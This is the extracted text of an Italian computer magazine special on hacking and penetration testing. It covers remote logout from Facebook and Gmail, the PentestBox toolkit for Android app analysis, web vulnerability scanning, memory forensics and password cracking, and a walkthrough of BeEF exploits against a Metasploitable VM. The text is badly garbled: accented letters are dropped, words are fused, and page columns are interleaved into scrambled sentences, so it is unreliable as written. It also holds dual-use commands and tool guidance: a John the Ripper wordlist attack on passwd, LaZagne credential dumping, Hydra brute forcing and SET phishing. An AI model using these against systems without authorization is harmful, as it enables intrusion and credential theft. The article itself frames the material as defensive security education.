possibilit di effettuare il logout da remoto,
ovvero collegandoci da qualsiasi postazione
e terminando le eventuali sessioni aperte
lasciate su altri PC. Si tratta di pochi semplici
passaggi che possono, per, salvaguardare
i nostri account e la nostra privacy.

TERMINIAMO QUALSIASI SESSIONE


ATTIVA SU FACEBOOK
Cos come Gmail, anche Facebook offre la possibilit di
eseguire il logout di tutte le sessione attive del nostro
account da qualsiasi postazione. Per fare ci accediamo a
Facebook con il nostro account e andiamo su Impostazioni/Protezione, quindi facciamo clic sulla voce Dispositivi
da cui hai effettuato laccesso. Vedremo cos comparire
una lista contenente tutti gli accessi effettuati con il
nostro account. Per effettuare il logout da remoto sar
sufficiente cliccare sulla voce Termina attivit in corrispondenza della sessione di nostro interesse.

Vediamo come disconnetterci da remoto dal nostro account Gmail

Colleghiamoci al sito Internet https://mail.


google.com ed effettuiamo il login utilizzandolecredenzialidelnostroaccountGmail.Dopo
qualchesecondopotremovisualizzarelaclassica
schermatachecimostraimessaggidipostaelettronica in arrivo.

Aquestopuntodobbiamoscorrerelapagina
finoinfondo.Inbassoadestra,sottoleultime
e-mail, troveremo la voce Dettagli. Facciamo
clic su di essa per accedere alla schermata in
cui presente la funzione di Gmail che dobbiamo utilizzare per eseguire il logout da remoto.

Nella pagina Internet che si apre troveremo


elencate tutte le attivit recenti eseguite
dal nostro account. Per effettuare il logout di
tutte le sessioni attive non dobbiamo fare altro che cliccare sulla voce Esci da tutte le altre
sessioni web.
Speciali Win Magazine 13

Cos fa lhacker

| Fai da te | Cos entro nel tuo PC |

Con la pendrive
entro nel tuo PC
Mi bastano 5 minuti per entrare
nei tuoi sistemi sfruttando
vulnerabilit e bug di Windows
Cosa ci
occorre

40 MIN.
DIFFICILE

TOOL DI HACKING

PENTEST BOX
DVD
SOFTWARE COMPLETO
Sito Internet:
https://pentestbox.com

BUONI
CONSIGLI
MUOVERSI
NELLE DIRECTORY
La prima cosa da fare per
eseguire un penetration
test con la nostra Box
prendere conidenza con
il prompt dei comandi
e imparare a muoversi
nelle directory che ne
raccolgono i tool. Il
comando per cambiare
directory cd, seguito
dal percorso completo
della directory di destinazione. Supponendo
che Pentest Box sia
installata in C:\PenetrationTesting\PentestBox,
dobbiamo digitare il comando cd PenetrationTesting\PentestBox\bin per
portarci nella directory
che organizza le varie
categorie di strumenti
della Box. Per risalire di
una directory si utilizza il
comando cd. Negli esempi, inoltre, utilizzeremo
la voce path_Box per
indicare il percorso dove
installata la Box.

n tutti i laboratori di sicurezza viene sempre raccontato, quasi come un mantra,


un vecchio aneddoto secondo cui un PC
sicuro solo se isolato dalla Rete, privo
di periferiche di input e chiuso a chiave in
una stanza. chiaro che, con tutte queste
restrizioni, un computer, oltre che sicuro,
anche del tutto inutile. Oggi non facile
trovare un PC che non acceda al Web e che
non sia poco pi di una macchina da scrivere,
sicuramente infestato da virus, spyware e
trojan, a causa dellutilizzo di chiavette USB
infette e di un antivirus non aggiornato. In
aggiunta, bisogna anche considerare che
le minacce di sicurezza non arrivano pi
solo dai personal computer: le persone che
non hanno uno smartphone incollato alla
mano si contano sulla punta delle dita e i
primi elettrodomestici intelligenti iniziano
a collegarsi a Internet.

Internet delle cose


Oggi la connessione totale e le minacce di
sicurezza arrivano da dispositivi diversi: se
una volta per proteggerci bastava lantivirus
del computer, dobbiamo renderci conto che,
adesso, necessario stare pi attenti. Il furto
di identit sui social, password facili da indovinare, sistemi operativi non aggiornati, intrusi sulla rete di casa o hacker che prendono
il controllo di un elettrodomestico smart,
sono le nuove fonti di pericolo che rendono
vulnerabile tutto il nostro ecosistema informatico. Gli esperti di sicurezza suggeriscono
che, nei prossimi anni, le principali fonti
di minacce informatiche saranno proprio
gli elettrodomestici intelligenti, il cosiddetto Internet delle Cose, che sono un ottimo
punto di ingresso per i pirati informatici, a
causa di firmware e software difficilmente
aggiornabili.

Cos fa lhacker

| Cos entro nel tuo PC | Fai da te |

Lanello debole
dellecosistema informatico
Come sempre non ci perdiamo danimo e
studiamo il problema della sicurezza osservandolo da tutti i suoi punti di vista, anche
calandoci nei panni di un hacker, per capire
meglio i trucchi e le tecniche di attacco dei
pirati informatici. La risposta alle nuove
minacce una pratica nota come penetration test che ci viene fornita dagli esperti di
sicurezza, il settore dellInformatica che si
occupa di difendere i nostri PC da minacce,
attacchi e intrusioni. Un penetration tester
un professionista che offre i suoi servizi
alle aziende e, usando gli strumenti degli
hacker, cerca le debolezze per ottenere laccesso completo o parziale alle funzionalit o
ai dati. Il penetration test segna un cambia-

mento radicale negli obiettivi dellesperto di


sicurezza che passa da un atteggiamento di
difesa dei sistemi, al loro attacco.

Penetration test per tutti


Pentest Box una piattaforma per il penetration test creata specificamente per i sistemi
Windows che, da un lato, rende disponibile
questa tecnica di sicurezza anche agli utenti
non pratici di Linux; dallaltro, sfrutta lampio
supporto alle periferiche offerto dal sistema
di Redmond. Molti strumenti della Box si
devono eseguire da linea di comando e richiedono un po di confidenza con i comandi
DOS o Linux per controllarli, ma, di volta
in volta, nel descrivere i tool, spiegheremo
quali sono i comandi necessari e la sintassi
per invocarli.

La sicurezza offensiva
Pentest Box viene distribuita come un archivio RAR compresso da 2,5 GB, non richiede
installazione e pu essere decompressa sia
su disco, sia su una pendrive USB. importante sapere che, durante la decompressione,
lantivirus del nostro PC potrebbe segnalare
la presenza di possibili minacce dovute alle
tracce di alcuni exploit e strumenti di attacco. Possiamo scegliere di ignorare queste
segnalazioni o anche di rimuovere i file, ma,
nel secondo caso, alcuni test non saranno
disponibili. La piattaforma occupa poco
meno di 6 GB di spazio disco e lambiente
per il penetration test pu essere avviato
lanciando leseguibile PentestBox.exe (o,
se il nostro antivirus continua a rifiutarsi, e
non vogliamo disabilitarlo, PentestBox.bat).

I TOOL PER SCOVARE BUG ANCHE NEGLI SMARTPHONE ANDROID


Gli smartphone stanno diventando i
punti di accesso a molti servizi sensibili
come quelli bancari e custodiscono
tanti dati personali. Non c da meravigliarsi se Pentest Box ofre una sezione speciica per i sistemi Android.
Infatti, questi smartphone possono
installare software proveniente da
fonti non attendibili e unapp malevola, visti i dati che conserviamo
sullo smartphone, pu essere una
seria minaccia alla nostra sicurezza.
Androguard (www.winmagazine.it/
link/3221) una suite di programmi
scritti in Python (che un linguaggio
di programmazione supportato dalla
Box; si eseguono digitando python nome_del_programma.py) specializzati
per lanalisi dei programmi Android, in
particolare dei ile di installazione in
formato APK. Per usare Androguard
dobbiamo raggiungere la sua directory di installazione con il comando
cd C:\PenetrationTesting\PentestBox\
bin\androidsecurity\androguard o
anche cdandroidsecurity\androguard,

se siamo gi nella directory bin della


Pentest Box.

IL GUARDIANO DELLE APP


Androguard dotato di uninterfaccia
graica e si avvia con il comando python androgui.py, che guida la scelta
del ile con estensione .apk e la successiva visualizzazione del codice. Il
tool consente anche di salvare una
sessione di analisi e di ripristinarla
in un secondo momento. La Pentest
Box offre anche lAndroid ADT (Android Developer Tools, raggiungibile
in bin\androidsecurity\adt partendo
dalla directory principale della nostra
installazione) con tanto di ambiente
di sviluppo ed emulazione e leditor
Eclipse Juno per la scrittura delle app
Android. Androwarn, invece, un analizzatore del codice delle applicazioni
Android che, analizzando il pacchetto
di installazione, rileva comportamenti
sospetti e fraudolenti che coinvolgono i dati del cellulare, quelli personali
gli accessi alla scheda di memoria,

Apktool ricostruisce le risorse di un pacchetto di installazione Android.

ai servizi dello smartphone, e tanti


altri possibili pericoli. Per lanciare
Androwarn, dobbiamo portarci nella
sua directory con cd C:\PenetrationTesting\PentestBox\bin\androidsecurity\androwarn. Nella directory di
Androwarn presente lapplicazione
Android SampleApplication che possiamo utilizzare per fare qualche prova
di analisi (con il comando python androwarn.py SampleApplication\bin\
SampleApplication.apk -r html v 3) e
generare un report in formato HTML.

ATTIVITSOTTOCONTROLLO

Androguard offre anche uninterfaccia grafica.

Un pacchetto di installazione di
unapplicazione Android (un ile con
estensione .apk) non altro che un
archivio compresso contenente tutte
le risorse, le classi Java compilate ed
il loro elenco (il ile AndroidManifest.
xml). Se decomprimiamo il pacchetto
di installazione con un programma
classico, ne otteniamo per dei ile
illeggibili che non ci permettono di
ricostruire la natura dellapplicazione
da esaminare. a questo punto che

entra in gioco Apktool, uno strumento per decomprimere correttamente


i pacchetti di installazione Android
che permette anche di ricostruire il
pacchetto di installazione originale.
Per utilizzare Apktool dobbiamo essere nella sua directory di lavoro cd C:\
PenetrationTesting\PentestBox\bin\
androidsecurity\apktool ed eseguire
il comando apktool d applicazioneDaAnalizzare.apk che decomprime
la struttura dellapplicazione. Tutte le
analisi sul comportamento delle app
presentate precedentemente sono
statiche, nel senso che il codice viene
esaminato senza lanciarne lesecuzione. Con Introspy, la categoria di strumenti dedicati alla sicurezza Android
(ma anche iOS) si arricchisce di un tool
che, installato sullo smartphone da
controllare, genera la traccia navigabile (in HTML) di tutte lo operazioni
efettuate dal dispositivo durante lesecuzione di un programma. Analizzando il report, poi, possibile ricostruire
il comportamento reale dellapp per
capire presenta minacce di sicurezza.
Speciali Win Magazine 15

Cos fa lhacker
Una volta in esecuzione, la Box si presenta
come un command prompt avanzato che
accetta sia i classici comandi DOS, sia i comandi Linux. Per controllare pi operazioni
contemporaneamente, possibile aprire
molteplici tab (Ctrl+T) che sono controllati
dallemulatore incorporato nella piattaforma,
ConEmu (http://conemu.github.io).

Solo audit autorizzati!


Prima di iniziare le prove con la Pentest Box,

importante ricordare che gli strumenti per


il penetration test devono essere utilizzati
in maniera lecita e che una sessione di sicurezza di questo tipo deve essere eseguita
verso macchine nostre o, altrimenti, solo
se siamo autorizzati ad agire sui computer
altrui. Infatti, utilizzare gli strumenti del
penetration tester senza diritti o autorizzazione un reato. Se scoprire una falla di
sicurezza pu ancora essere considerata
unoperazione innocente (ma questo dipen-

| Fai da te | Cos entro nel tuo PC |

de dalla tecnica adottata), sicuramente non


lo sfruttare la falla per prendere il controllo
di un sistema non nostro o che non ci ha
autorizzato a lanciare il test. Infatti, lo scopo principale di questo articolo quello di
prendere consapevolezza dei pericoli e degli
strumenti che il penetration test ci offre per
difenderci. Vedremo una carrellata di strumenti e ne metteremo in pratica alcuni: gli
altri li svilupperemo sui prossimi numeri di
Win Magazine.

Lapk che nasconde il malware


Android pu installare anche pacchetti scaricati dal Web e questi possono nascondere dei virus. Vediamo
insieme come controllare la natura di unapp Android con gli strumenti di Pentest Box.

Esaminiamo lapp mobile


sospetta

La prima operazione da fare su un .apk


sospetto, esaminarne il contenuto. Portiamoci nella directory di lavoro con cd path_Box\bin\
androidsecurity\androguard e avviamo lanalisi del pacchetto con python androapkinfo.py -i
path_del_ile_sospetto.apk.

Questi permessi sono eccessivi

Una stima della sicurezza dellapp si ha


controllandone i permessi. Scorriamo per
cercare la sezione REQUESTED PERMISSIONS,
i quali, nel caso in oggetto, appaiono eccessivi:
lamministrazione del Bluetooth, la connessione
alla rete, i task in esecuzione e laccesso alla fotocamera.

Analizziamo il report

Completata la scansione, troveremo un


report in formato HTML molto dettagliato
allinterno della cartella path_Box\bin\androidsecurity\androwarn\report. Avviamo con il browser
il ile HTML che porta il nome del programma e
autorizziamo il componente ActiveX per visualizzarlo.
16 Win Magazine Speciali

Attenti alle richieste


sospette

Esaminiamo ANALISYS RESULTS e i dettagli in Telephony Identiiers Leakage. Scopriamo che


lIMEI del cellulare e il seriale della SIM sono a disposizione dellapplicazione. Nella sezione ANDROIDMANIFEST.XML c anche una traccia del malware: lattivit
smart.McbainServicce.

Tanti utili strumenti

Approfondiamo lanalisi dellapp utilizzando il tool Androwarn. Digitiamo quindi cd


path_Box\bin\androidsecurity\androwarn e utilizziamolo per una scansione approfondita del ile
sospetto con python androwarn.py -i path_del_
file_sospetto.apk v 3 r html generando un
report HTML.

La veriica inale

Una semplice ricerca su Google della


stringa smart.McbainServicce ci restituisce molte segnalazioni. Tra queste, troviamo
anche le pagine di VirusTotal, con una positivit segnalata da 39 dei 55 antivirus utilizzati, e
Symantec confermano il malware. Pericolo infezione scampato?

| Cos entro nel tuo PC | Fai da te |

Cos fa lhacker

ANALIZZIAMO LE VULNERABILIT CHE SI NASCONDONO NEI SITI WEB


Le scansioni di sicurezza dei siti Internet sono uno strumento indispensabile per i webmaster, ma anche per gli appassionati che curano un
piccolo blog. Nella lotta contro i pirati informatici, utilizziamo i loro stessi
strumenti per rilevare problemi, falle di sicurezza e altre informazioni che
non dovrebbero inire in mano a malintenzionati. La Pentest Box ofre Burp,
che una suite completa da utilizzare per analizzare un nostro sito con lo
scopo di migliorarne la sicurezza. Per utilizzare Burp, dobbiamo avviarlo
con il comando burp e poi far puntare la navigazione del browser al suo
server proxy interno. Se utilizziamo Internet Explorer, apriamo le Opzioni
Internet, selezioniamo il tab Connessioni e Impostazioni LAN e spuntiamo
Server Proxy con indirizzo 127.0.0.1 e porta 8080. Quando navighiamo dal
nostro browser, Burp registra tutte le nostre azioni e le risposte del sito, ne
ricostruisce la struttura e pu lanciare attacchi alla ricerca di vulnerabilit.
Proprio per questo motivo importante utilizzare Burp su un nostro sito o
su un dominio per il quale siamo autorizzati a lanciare le prove di sicurezza.

SIMULIAMO UN ATTACCO
Una tecnica di attacco molto utilizzata dai pirati informatici lSQL injection che consiste nelliniettare, letteralmente, del codice malevolo
allinterno di uninterrogazione ad un database, per scoprire informazioni
sensibili come account e password o per assumere un ruolo privilegiato.
JSQL (http://sqlmap.org), SqlMap e Vega sono alcuni degli strumenti speciici per il controllo dellSQL oferti dalla Box, ma anche gli altri scanner
che abbiamo presentato ofrono questo tipo di controlli. La Pentest Box
ofre anche altri scanner e crawler per la sicurezza Web: tra questi citiamo
velocemente W3af, Yasuo, Paros e DirBuster, Zap e Commix.

METTIAMO IL BLOG WORDPRESS SOTTOCHIAVE

UNO SCANNER SEMPLICE DA USARE


Per i pi smanettoni, Golismero ofre allutente un ambiente a riga di comando che pu essere utilizzato per eseguire audit di sicurezza su bersagli
Web. Una scansione veloce pu essere lanciata portandosi nella directory
di lavoro del programma con il comando golismero e poi avviando il tool
con golismero.bat SCAN sitoDaAnalizzare. Le scansioni efettuate da
Golismero possono essere anche mirate a minacce speciiche, ma, in questo
caso, tutti i parametri devono essere speciicati su riga di comando. Tornando
alle interfacce graiche per gli audit di sicurezza Web, segnaliamo Vega che
, forse, uno degli scanner pi semplici da utilizzare. Una volta nella sua
directory di lavoro, basta digitare vega.exe e conigurare il bersaglio della
scansione per ottenere, velocemente, un report sulla sicurezza del sito.

Molti siti realizzati con WordPress, sono su server personali che non vengono
aggiornati e rappresentano una minaccia di sicurezza a causa di note vulnerabilit delle vecchie versioni. Per controllare se il nostro sito sia afetto
da problemi, possiamo utilizzare WPscan, lutilit a riga di comando che
veriica la presenza di falle di sicurezza e codice obsoleto. WPscan efettua analisi non intrusive, ma anche attacchi a forza bruta, cio tantissimi
tentativi di accesso, sullaccount admin con una lista di password. Per
usare lo strumento, non necessario essere in una directory speciica ma
basta scrivere wpscan -url sitoDaAnalizzare e premere Invio. Un altro
scanner per vulnerabilit dotato di interfaccia graica IronWasp. Questo
strumento si avvia digitando il comando ironwasp seguito da Invio. Una
volta avviato lambiente, possiamo conigurare il browser per puntare al
suo proxy, come per Burp, ma anche possibile utilizzare il tab Console per
indicare direttamente lindirizzo del sito da analizzare. Dopo aver regolato
diversi parametri di scansione, il nostro sito viene analizzato e le possibili
minacce sono evidenziate.

I TOOL DELLINFORMATICA FORENSE USATI DAGLI INVESTIGATORI


Tutti i recenti casi di cronaca nera hanno coinvolto gli
ad un PC ed anche in grado di recuperare foto
esperti di informatica forense che, analizzando log, ile
perse dalle memory card.
cancellati, temporanei e altre tracce di attivit sui PC Volatility una collezione di script in Python che
degli indiziati, contribuiscono a costruire o a demolire
permettono lanalisi della memoria volatile di un
gli impianti accusatori. Non tutti sanno, ad esempio,
computer.
che un ile cancellato non viene isicamente rimosso dal Dumpzilla si utilizzata per analizzare lattivit di didisco rigido del nostro computer, se non con unevenversi browser e pu farci capire quali tracce lasciamo
tuale riscrittura e che pu essere ricostruito facilmente.
sul nostro sistema con la nostra attivit Web. Pu
Nel settore dellinformatica forense, la Pentest Box ofre
fare ricerche mirate sulla cache, sui download, su
strumenti per lanalisi del ile system, della memoria
tutta la cronologia, sui form compilati e su tutto ci
RAM del PC o tool pi speciici per lanalisi dei browser
che il browser registra della nostra navigazione.
e delle attivit degli utenti.
Make-pdf-javascript e make-pdf-embedded
Autopsy dotata di interfaccia graica e integra
servono per inserire un codice javascript (che viene
diversi strumenti per investigare su cosa successo
eseguito allapertura del documento) allinterno di

un ile PDF. La risposta a questo tipo di pericoli, che


possono derivare da un innocente PDF allegato
ad une-mail, sono gli analizzatori come Origami,
PeePDF e PDFparser.

Speciali Win Magazine 17

Cos fa lhacker

| Fai da te | Cos entro nel tuo PC |

Andiamo a sbirciare tra le pieghe


Vediamo come utilizzare il tool Volatility, messo a disposizione sempre da Pentest Box, per analizzare unimmagine della

Informazioni di base

La prima cosa da fare sullimmagine della


RAM ottenerne le informazioni principali.
Nella directory di lavoro del tool (cd path_Box\bin\
ForensicTools\volatility), il comando da utilizzare volatility.exe -f path_del_dump imageinfo.

Lo stato delle connessioni

Per conoscere lo stato delle connessioni attive


tive al momento della generazione.
generazione
Avviamo lanalisi del pacchetto con volatility.exe
-f path_del_
_dump connscann per leggere a video
i dati relativi alla conigurazione della rete.

I processi in esecuzione

Tale lista si ottiene con volatility.exe -f


path del dump pslistt visualizzata in una
path_del_dump
ttabella
b ll dei processi con identiicativi e numero di
thread. Per rilevare i processi nascosti, si utilizza
volatility.exe -f path_del_dump psscan.

ATTACCO ALLE PASSWORD:


QUANDO IL PUNTO DEBOLE SIA
AMO NOI
Spesso il problema di sicurezza dei o troppo comuni una d
delle cause
nostri sistemi siamo proprio noi: la pi difuse di facile accesso ai sistescelta di password troppo semplici mi. In alcuni casi fortunati, i siti sui

quali ci registriamo e alcuni


sistemi operativi efettuano
un controllo delle password e
ci impongono scelte non banali. Quando questo meccanismo non viene utilizzato, la nostra
parola segreta spesso qualcosa di
breve, noto o non tanto diicile da
indovinare. La Pentest Box ci ofre gli
strumenti per veriicare la sicurezza
delle nostre password e metterci
nei panni di un hacker che utilizza
un dizionario di parole chiave per
entrare, in modo fraudolento, nel
nostro sistema.

CONTROLLI AVANZATI

Grazie ad un tool come Lazagne possiamo recuperare un poco tempo una p


password
salvata dal browser.

18 Win Magazine Speciali

Non si tratta, indubbiamente, di


strumenti facili da utilizzare: siamo
di fronte a utility a riga di comando che spesso richiedono anche la

Cos fa lhacker

| Cos entro nel tuo PC | Fai da te |

della memoria RAM del computer


memoria di un PC catturata tramite RamCapturer. Scopriremo, cos, eventuali strani malfunzionamenti del sistema.

Analisi dei driver

Variabili dambiente

Per ricostruire lo stato di tutti i moduli (in


genere driver o DLL) caricati dal PC quanquan
ddo stata
t generata limmagine della memoria,
utilizaimo il comando volatility.exe -f path_del_
dump moduless che visualizza anche il percorso
delle librerie trovate.

conoscenza della crittograia, ma


importante approfondire un po

Per conoscere il valore delle variabili di


ambiente necessario
n
utilizzare il comand volatility.exe
do
l
-ff path_del_dump envars. Tra
questi dati troviamo anche alcune informazioni che
riguardano la classe del processore e larchitettura del PC.

questi tool per difenderci meglio e


per essere pi consapevoli dei risschi
che corriamo quando scegliamo
una parola segreta troppo semplice.
JohnTheRipper un noto p
programma Linux che viene utilizzzato per recuperare una passwo
ord
di accesso smarrita. Le passwo
ord
dei sistemi Linux sono consservate nel ile /etc/passwd, ma
sono criptate e quindi n
non
leggibili. Con il comando jo
ohn
--wordlist=password.lst --ru
ules
passwd recuperiamo le password
memorizzate da Lin
nux,
con john --show passwd le visualizziamo
o.
CryptoHaze un tool
per attacchi di tipo fo
orza
bruta. Lo strumento u
utilizza la CPU multicore de
elle
schede graiche NVIDIA per

Processi e servizi

Unattenta analisi del dump della memoria pu fornire anche dati utili sulla lista dei
processi che sono installati sul PC. Con volatility.
exe -f path_del_dump svcscan possibile ottenere dettagli sui servizi: nome, tipologia e lo stato
allatto del dump.

ridurre il tempo necessario a decifrare la parola segreta.


LaZagne un tool per recuperare tutte le password che sono
conservate nel nostro PC. Il programma viene eseguito da riga
di comando e supporta diversi
ambiti di rilevamento che vanno
dal sistema operativo, ino ai servizi remoti come chat ed e-mail e
deve essere avviato, con i privilegi
di amministratore, una volta raggiunta la sua directory di lavoro
con cd C:\PenetrationTesting\
PentestBox\bin\password_attacks\LaZagne\Windows. Usando LaZagne, possiamo renderci
conto del pericolo causato da un
sistema compromesso e delle informazioni che possiamo fornire,
involontariamente, ad un hacker.
Patator tra gli strumenti pi

completi per efettuare attacchi


di forza bruta alle password, ma
ofre solo uninterfaccia a linea di
comando. Con Patator possibile
mettere alla prova la sicurezza di
servizi FTP, SSH,Telnet, SMTP, POP
e IMAP (i servizi di posta elettronica), VNC (controllo remoto), o
cercare di forzare la login di database come MSSQL, MySQL e
Postgre.
THC Hydra Windows un altro
strumento per attaccare servizi
con autenticazione basata su
login utente e password. Il programma legge le login e le password da due ile che riceve dalla riga di comando al momento
dellinvocazione e pu attaccare
uno o pi bersagli leggendone
lindirizzo in un terzo ile di conigurazione.

THC Hydra utilizza un elenco di passsword per ottenere laccesso alla shell di comando del sistema operativo vittima di un attacco.

Speciali Win Magazine 19

Cos fa lhacker
BUONI
CONSIGLI
I TRUCCHI
DEGLI ESPERTI
Sempre pi spesso, per
portare a termine con
successo i loro attacchi,
i pirati informatici
utilizzano tecniche di ingegneria sociale per costruirsi unidentit falsa
ma credibile da utilizzare
per ingannare gli utenti
del Web. Social Engineer
Toolkit lo strumento offerto dalla Pentest Box a
questo scopo. SET pu effettuare phishing (invio
di e-mail fraudolente a
nome di servizi noti), ma
soprattutto generare ed
allegare moltissimi tipi
di malware alle e-mail.
Anche in questo caso ci
dobbligo ricordare che
queste sono pratiche
illegali. SET dispone
anche di un generatore
di codice infetto per
Arduino che sfrutta la
nota schedina per attaccare i sistemi a cui viene
connessa.

| Fai da te | Cos entro nel tuo PC |

Scoviamo i bug di Windows


I tool della Pentest Box sono gli stessi utilizzati dai pirati informatici per scopi illeciti: utilizziamoli,
quindi, solo su macchine nostre. Ecco come provarli senza fare danni.

Prepariamo il bersa lio

Come bersaglio per i nostri test di sicurezza possiamo usare la distribuzione Linux Metasploitable: scarichiamola da
www.winmagazine.it/link/3222 sotto forma di archivio compresso.
Nel ile ZIP troveremo diversi ile corrispondenti ai dischi rigidi virtuali
che useremo per creare la macchina virtuale bersaglio.

Avviamo la macchina virtuale

Per utilizzare la Metasplotable, scarichiamo ed installiamo


VirtualBox (www.virtualbox.org/wiki/Downloads), che un
software per gestire macchine virtuali: creiamo una Nuova macchina Linux ed assegniamole, dopo aver decompresso il pacchetto Metasploitable, il ile Metasploitable.vmdk come disco rigido.

VITTIME
SOTTO STRESS
La tecnica nota come
Stress Testing una
veriica di come un
sistema reagisce a
possibili sovraccarichi
dovuti a troppe richieste
da servire. La pratica di
attacco che si vuole simulare nota come DoS
o Denial of Service (letteralmente negazione
del servizio). Per causare
un DoS, gli hacker, che
controllano centinaia di
server insicuri, li utilizzano per inviare migliaia
di richieste ad un singolo
bersaglio, con il risultato
di sovraccaricare il server e di renderlo inattivo. Gli stessi strumenti
possono essere utilizzati
per veriicare quanto un
nostro server sia esposto
al DoS. La Pentest Box
ofre diversi programmi
utili allo scopo tra questi
citiamo Ethercap, Wireshark, ma anche Burp, di
cui abbiamo parlato in
precedenza.

20 Win Magazine Speciali

Iniziamo lattacco

Scelto un bersaglio da conquistare, possiamo iniziare la


nostra sessione di penetration test. Scopriamo innanzitutto
lIP che VirtualBox ha assegnato alla macchina virtuale Metasploitable: effettuiamo una scansione della rete con Zenmap mediante
il comando zenmap sugli indirizzi della rete locale.

Un tool adatto allo scopo

Per iniziare ad analizzare la conigurazione di sicurezza della


Metasploitable, usiamo Beef, un tool che sfrutta il browser
Web per attaccare la sicurezza di un sistema bersaglio. Portiamoci
nella directory di Beef con cd C:\PenetrationTesting\PentestBox\
bin, coniguriamolo con bundle install e avviamolo con ruby beef.

La trappola pronta!

Puntiamo quindi il browser allindirizzo 127.0.0.1:3000/ui/


authentication, utilizzando beef come Username e Password. Beef dispone di una serie impressionante di exploit e pu
pubblicare anche delle pagine Web trappola, con lintento di far eseguire codice malevolo ai browser delle vittime e prenderne il controllo.

Attacco in corso

A questo punto, sicuri di attaccare la macchina virtuale su cui


in esecuzione la distribuzione Metasploitable, possiamo continuare la nostra sessione di penetration test e iniziare a lanciare i vari
exploit di Beef contro la nostra vittima. Per farlo, suficiente digitare
il nome dellexploit da riga di comando e confermare con Invio.

Cos fa lhacker
ALTRI STRUMENTI MESSI A DISPOSIZIONE DALLA PENTEST BOX
La Pentest Box ofre anche una nutrita serie di
aiancata al prompt dei comandi e quindi
utility e ambienti gi conigurati per le sessioni
non si sovrappone ad esso.
di sicurezza.
Atom un editor di testo che si integra be- Vim dedicato ai pi smanettoni, afezionati agli
editor classici di Linux: si tratta di un editor di
ne con il sistema basato su ambiente a riga
testo leggero e potente. In questo caso, la inestra
di comando. Viene visualizzato in modalit
delleditor viene per visualizzata a tutto schermo e, per eseguire contemporaneamente altri
La versione modificata di Firefox Portable, gi inclusa
comandi dal prompt, dobbiamo aprire unaltra nella Metasploitable, offre tutto ci che serve allhacker.
sessione con Ctrl+T o cliccando sullicona verde
con il simbolo + sulla barra dei comandi della Box. C da dire, inine che Box riconosce sia comandi
DOS, sia comandi Linux: per visualizzare il conte Firefox Portable un altro strumento della Box nuto di una directory, possiamo utilizzare il comolto utile, perch gi conigurato con tutti i tool mando DOS dir, ma possiamo anche utilizzare la
ed i plug-in per lesperto di sicurezza: disponibile sua versione alternativa Linux ls. Questi sono solo
nella directory \bin\FirefoxPortable della Box, un esempio dei comandi bilingue (Windows e
questa versione del famoso browser ha gi tutto Linux) della Box. La Pentest associa la semplicit
quello che serve per unanalisi profonda delle duso tipica di Windows alla potenza e versatilit
pagine Web e per attivare/disattivare javascript, dei comandi Linux per creare un ambiente usabile,
cache, cookie, fogli di stile, proxy di navigazione, ma allo stesso tempo capace di eseguire sessioni di
Atom divide la finestra principale della Box
e ofre un pulsante per tutto quello che ci pu penetration test come una qualsiasi distribuzione
con il prompt dei comandi per evitare fastidiose
dare un controllo veloce sulla nostra navigazione Linux (vedi Distro Alternative in basso).
sovrapposizioni.

LE DISTRIBUZIONI ALTERNATIVE PER TESTARE LA SICUREZZA DEL PC


Tra gli strumenti pi completi per il penetration test possiamo provare anche le distribuzioni Linux Kali (www.kali.org/downloads)
e BackBox (www.backbox.org/downloads).
Entrambe sono sia installabili, sia live, cio ci
basta inserire il DVD su cui le abbiamo masterizzate ed avviare il PC per provarle senza effettuare linstallazione, ed entrambe
sono dotate di tutti gli strumenti degli hacker, organizzati per gruppi di funzionalit.
La distribuzione Samurai specifica per il test
di applicazioni Web e viene distribuita come
unapplicazione per la tecnologia di virtualiz-

zazione VMWare (www.vmware.com). Si scarica


come un archivio ZIP di 3,11 GB (https://sourceforge.net/projects/samurai) da decomprimere
e poi caricare su VMWare.
Tra tutte quelle esaminate, la Santoku Linux
appare la distribuzione di sicurezza pi completa. La distro scaricabile come un file ISO
da 2,36 GB (https://sourceforge.net/projects/
santoku) e, come le altre, non richiede di essere
installata sul disco fisso ma pu essere eseguita in modalit live direttamente dal DVD.
A differenza delle altre, oltre ad offrire un campionario di strumenti per lesperto di sicurezza

veramente completo, la Santoku presenta


anche alcuni tutorial e guide molto utili per chi
muove i primi passi nel settore del penetration
Test. Anche la distribuzione Parrot OS (https://
sourceforge.net/projects/parrotsecurity) pu
essere avviata direttamente dal DVD o installata sul disco rigido. Per accedere allambiente
utilizziamo laccount root e la password toor.
Una volta loggati, abbiamo accesso agli strumenti di sicurezza tipici di queste distribuzioni
e, se vogliamo, possiamo installare Parrot sul
disco semplicemente cliccando sullicona del
desktop.

Samurai una distribuzione che permette di testare le


applicazioni Web. Funziona con VMWare.

La distro Santoku dedicata ai neofiti dei test di


sicurezza in quanto comprende dei tutorial pratici.

Parrot, una distribuzione per il penetration test


funzionale ed efficace.

Speciali Win Magazine 21

Cos fa lhacker

| Fai da te | Cos ti spio dallo smartphone |

Cos ti spio da
cellulare e webcam
Un pirata si confessa e ci svela come in pochi passi riesce
ad entrare in un telefonino e catturare foto, video e audio

ig brother is watching you La pi


famosa premonizione del romanzo
1984 di George Orwell si tramutata,
mai come ora, in una triste realt. A spiarci
non di certo nostro fratello, ma una miriade
di malintenzionati e pirati pronti a ficcare
il naso nella nostra vita privata. A molti ci
non sembrer per nulla una novit: diverse
volte in passato, infatti, abbiamo puntato i
riflettori sui pericoli ai quali la nostra privacy sottoposta. Software capaci di rubarci
lidentit virtuale o di accedere ai nostri file
pi importanti sono (purtroppo) allordine
del giorno. Ma invece che migliorare, la situazione peggiora e i pirati si allineano con
i passi in avanti compiuti dalla tecnologia.

Nuovi dispositivi,
nuovi attacchi
A nuovi device e ai loro numerosi accessori si
affiancano tecniche di violazione della vita
privata sempre pi sofisticate. Un esempio?

Concentriamoci per un attimo sugli smartphone. Molti di noi sapranno gi che c


chi riesce ad intrufolarsi nelle nostre conversazioni WhatsApp o nella nostra rubrica
telefonica. Ma chi avrebbe mai pensato che
i pirati fossero capaci anche di attivare da
remoto la fotocamera e spiarci (nel senso
letterale del termine)? Focalizziamoci ora
sulle Webcam. Anche se non lavremmo mai
immaginato, mentre stiamo guardando il
monitor, leggendo le notizie di una pagina
Web o spulciando le bacheche Facebook
dei nostri amici, ci potrebbe essere qualcuno che ci controlla direttamente da questo piccolo e solo apparentemente innocuo
occhio elettronico, senza che il LED della
stessa sia attivo. In definitiva, smartphone,
tablet, Webcam e IPCam si sono trasformati
in veri e propri spioncini di una porta dietro
la quale si nasconde gente senza scrupoli e
